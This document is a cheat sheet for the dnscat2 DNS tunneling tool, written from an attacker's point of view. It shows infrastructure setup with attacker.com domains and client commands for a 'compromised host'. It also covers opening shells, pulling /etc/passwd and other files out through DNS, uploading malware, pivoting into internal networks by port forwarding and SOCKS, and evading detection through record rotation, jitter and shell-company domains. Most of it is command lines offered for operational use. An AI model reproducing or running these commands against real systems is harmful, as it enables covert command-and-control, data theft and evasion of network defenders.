dnscat2

dnscat2 creates encrypted DNS tunnels for command-and-control communication, allowing attackers to bypass network restrictions by hiding traffic within DNS queries. It supports multiple DNS record types, session management, and full bidirectional communication channels.

Installation

Server Setup (Ruby)

Install dnscat2 server from source with Ruby dependencies:

# Clone server repository
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server

# Install Ruby gems
gem install sinatra
gem install trollop
gem install bundler

# Or use Gemfile
bundle install

# Run server
ruby dnscat2.rb domain.com

Required Ruby gems: sinatra, trollop, optional eventmachine for async operations.

Client Compilation (C)

Compile the C client with make:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client

# Compile with make
make

# Or compile with gcc directly
gcc -o dnscat dnscat.c -lm -lpthread

# Windows (MinGW)
make windows

Dependencies: libpthread, libm (math library), libwininet for Windows builds.

Infrastructure Setup

Domain and DNS Configuration

# Delegate subdomain to your NS records
your-domain.com NS ns.attacker.com

Configure authoritative DNS server to handle queries for your tunnel domain:

# Example with BIND (named.conf)
zone "tunnel.attacker.com" {
    type master;
    file "/etc/bind/zones/tunnel.attacker.com";
    allow-transfer { none; };
};

Authoritative DNS Server

Point NS records to your controlled nameserver where dnscat2 will listen:

# DNS record configuration
tunnel.attacker.com IN NS dns1.attacker.com
dns1.attacker.com IN A 192.0.2.100

dnscat2 server listens on UDP port 53 by default. Ensure firewall allows inbound DNS traffic.

Server Usage

Basic Server Launch

Start the dnscat2 server on specified domain:

# Default usage
ruby dnscat2.rb domain.com

# Listen on specific interface
ruby dnscat2.rb --dns server=0.0.0.0,53 domain.com

# With port specification
ruby dnscat2.rb --dns server=0.0.0.0,5353 domain.com

# Verbose output
ruby dnscat2.rb -v domain.com

# Super verbose (debug)
ruby dnscat2.rb -vv domain.com

Security Options

Enable encryption and authentication on the server:

# Require pre-shared secret for authentication
ruby dnscat2.rb --secret mysecretkey domain.com

# Security modes
ruby dnscat2.rb --security=open domain.com        # No encryption
ruby dnscat2.rb --security=encrypted domain.com   # Encrypted, no auth
ruby dnscat2.rb --secret key --security=encrypted domain.com

# Disable caching (forces fresh DNS lookups)
ruby dnscat2.rb --no-cache domain.com

# Set max packet length
ruby dnscat2.rb --max-length 255 domain.com

Client Usage

Basic Client Connection

Connect to dnscat2 server from compromised host:

# Basic connection
./dnscat --dns domain=domain.com

# Specify DNS server IP
./dnscat --dns server=192.0.2.100 --dns domain=domain.com

# With pre-shared secret
./dnscat --dns domain=domain.com --secret mysecretkey

# Verbose mode
./dnscat --dns domain=domain.com -v

DNS Record Type Selection

Specify which DNS record types to use for tunneling:

# Use TXT records (most reliable)
./dnscat --dns type=TXT --dns domain=domain.com

# Use MX records
./dnscat --dns type=MX --dns domain=domain.com

# Use CNAME records
./dnscat --dns type=CNAME --dns domain=domain.com

# Use A records
./dnscat --dns type=A --dns domain=domain.com

# Use AAAA records (IPv6)
./dnscat --dns type=AAAA --dns domain=domain.com

# Cycle through multiple types
./dnscat --dns type=TXT --dns type=MX --dns domain=domain.com

Retransmission and Reliability

Control packet retransmission behavior:

# Set maximum retransmit attempts
./dnscat --max-retransmits 5 --dns domain=domain.com

# Increase timeout (milliseconds)
./dnscat --dns timeout=1000 --dns domain=domain.com

# Reduce timeout for faster response
./dnscat --dns timeout=500 --dns domain=domain.com

Session Management

Interactive Commands

Manage active sessions within dnscat2 server:

# List all active sessions
> sessions

# Connect to specific session
> session -i 1

# Kill a session
> kill 1

# Suspend session (without terminating)
> suspend 1

# Resume suspended session
> resume 1

# Clear history
> history clear

Session Types

Sessions vary by type and functionality:

# View session details
> sessions -i 1 --detailed

# Switch between sessions quickly
> session -i 2
> session -i 3

Command Shell

Interactive Shell Access

Establish interactive shell through DNS tunnel:

# Start shell session
> shell

# Execute single command
> exec whoami
> exec ifconfig
> exec cat /etc/passwd

Execute Remote Commands

Run commands without interactive shell:

# From server console
> exec id
> exec uname -a
> exec ps aux
> exec netstat -an

File Transfer

Download Files from Target

Retrieve files through DNS tunnel to attacker system:

# Download single file
> download /etc/passwd

# Download to specific path
> download /etc/passwd /tmp/passwd.txt

# Download entire directory
> download /home/user/documents

Upload Files to Target

Transfer files from attacker to compromised host:

# Upload file
> upload /path/to/local/file /path/on/target

# Upload with confirmation
> upload ./malware.elf /tmp/malware.elf

Port Forwarding

Local Port Forwarding Through Tunnel

Forward local ports through the DNS tunnel:

# Listen on local port and forward through tunnel
> listen 127.0.0.1 4444 target_ip 3389

# Forward multiple ports
> listen 127.0.0.1 8080 internal-web-server 80
> listen 127.0.0.1 5432 internal-db 5432

Accessing Forwarded Services

Connect to internal services via forwarded ports:

# RDP through tunnel
rdesktop 127.0.0.1:4444

# SSH through tunnel
ssh -p 2222 user@127.0.0.1

# Database access
mysql -h 127.0.0.1 -P 5432 -u root

Tunneling

SOCKS Proxy Setup

Create SOCKS proxy for full network access through tunnel:

# Establish SOCKS proxy
> socks 127.0.0.1 1080

# Access internal network through proxy
proxy-host: 127.0.0.1
proxy-port: 1080

Using SOCKS Proxy

Route traffic through established SOCKS tunnel:

# curl through SOCKS
curl --socks5 127.0.0.1:1080 http://internal-server

# SSH through SOCKS
ssh -o ProxyCommand='nc -x 127.0.0.1:1080 %h %p' user@internal-host

# Proxychains configuration
proxychains nmap -sV internal-network

Encryption

Pre-Shared Secret Authentication

Use pre-shared keys for authentication between client and server:

# Server with secret
ruby dnscat2.rb --secret "SuperSecretPassword123" domain.com

# Client with matching secret
./dnscat --secret "SuperSecretPassword123" --dns domain=domain.com

SAS Authentication

Verify connection with SAS (Short Authentication String):

# Server prompts SAS on first connection
# Compare SAS on both client and server console
# Type "y" to confirm match
SAS (client): abc123
SAS (server): abc123

Encryption Modes

Different encryption configurations:

# No encryption (--security=open)
ruby dnscat2.rb --security=open domain.com

# Encrypted without authentication
ruby dnscat2.rb --security=encrypted domain.com

# Encrypted with pre-shared secret (most secure)
ruby dnscat2.rb --security=encrypted --secret mykey domain.com

DNS Record Types

Record Type Comparison

Type	Size	Reliability	Stealth	Detection Risk
TXT	~255 bytes	Excellent	Good	Medium
A	4 bytes	Excellent	Poor	High
AAAA	16 bytes	Good	Poor	High
MX	Variable	Good	Medium	Medium
CNAME	Variable	Good	Medium	Medium
NS	Variable	Moderate	Medium	Medium

Choosing Record Types

Select based on network filtering and monitoring:

# TXT records - most reliable, common in logs
./dnscat --dns type=TXT --dns domain=domain.com

# A records - small, fast, but suspicious high volume
./dnscat --dns type=A --dns domain=domain.com

# MX records - less monitored, good alternative
./dnscat --dns type=MX --dns domain=domain.com

# Mixed types - rotate for evasion
./dnscat --dns type=TXT --dns type=MX --dns type=CNAME --dns domain=domain.com

Troubleshooting

Connection Issues

Verify DNS resolution and connectivity:

# Test DNS resolution
nslookup query.domain.com
dig @ns.attacker.com query.domain.com

# Check server listening
netstat -ulnp | grep 53
ss -ulnp | grep 53

# Test with dig from client
dig @192.0.2.100 test.domain.com TXT

Firewall and Restrictions

Bypass DNS filtering and monitoring:

# If DNS port blocked, use alternate port
ruby dnscat2.rb --dns server=0.0.0.0,5353 domain.com

# Client connects to alternate port
./dnscat --dns server=192.0.2.100:5353 --dns domain=domain.com

# Use DNS over HTTPS (requires additional config)
# Many corporate firewalls restrict DoH

Debugging Output

Increase verbosity for troubleshooting:

# Client verbose
./dnscat -v --dns domain=domain.com
./dnscat -vv --dns domain=domain.com

# Server verbose
ruby dnscat2.rb -v domain.com
ruby dnscat2.rb -vv domain.com

Best Practices

Operational Security

Maintain stealthy DNS tunneling operations:

Use TXT or MX records instead of A records (less suspicious)
Rotate record types to evade pattern detection
Use pre-shared secrets and encryption always
Monitor DNS query volume and frequency
Distribute queries over time to avoid rate-based detection
Use domains registered to shell companies or compromised registrars
Implement traffic shaping to match legitimate DNS patterns

Detection Evasion

Techniques to avoid network monitoring:

Randomize query intervals (add jitter to timing)
Use legitimate-looking subdomains and query names
Limit bandwidth to match normal DNS traffic
Avoid querying during off-hours (traffic analysis)
Use multiple tunnel domains if possible
Implement retry logic for failed queries
Monitor for DNS query logging and filtering

Operational Security Checklist

# Test DNS filtering
./dnscat --dns type=TXT --dns domain=test.domain.com

# Verify encryption works
./dnscat --secret testkey --dns domain=domain.com

# Monitor bandwidth
top -p $(pgrep dnscat)

# Check query logs
tail -f /var/log/syslog | grep "domain.com"

Alternative DNS Tunneling Solutions

Tool	Purpose	Advantages
Iodine	DNS tunnel (older)	Lightweight, simple
dns2tcp	TCP over DNS	Reliable, RFC-compliant
Chisel	HTTP/HTTPS tunneling	Modern, GO-based
Cobalt Strike	Beacon DNS plugin	Enterprise C2, integrated
OzymanDNS	DNS tunneling	Simple Python implementation
DNSExfil	Data exfiltration	Stealthy, modular

DNS rebinding attacks
DNS cache poisoning
DNSSEC spoofing
DNS amplification DDoS
DNS tunneling with VPN overlay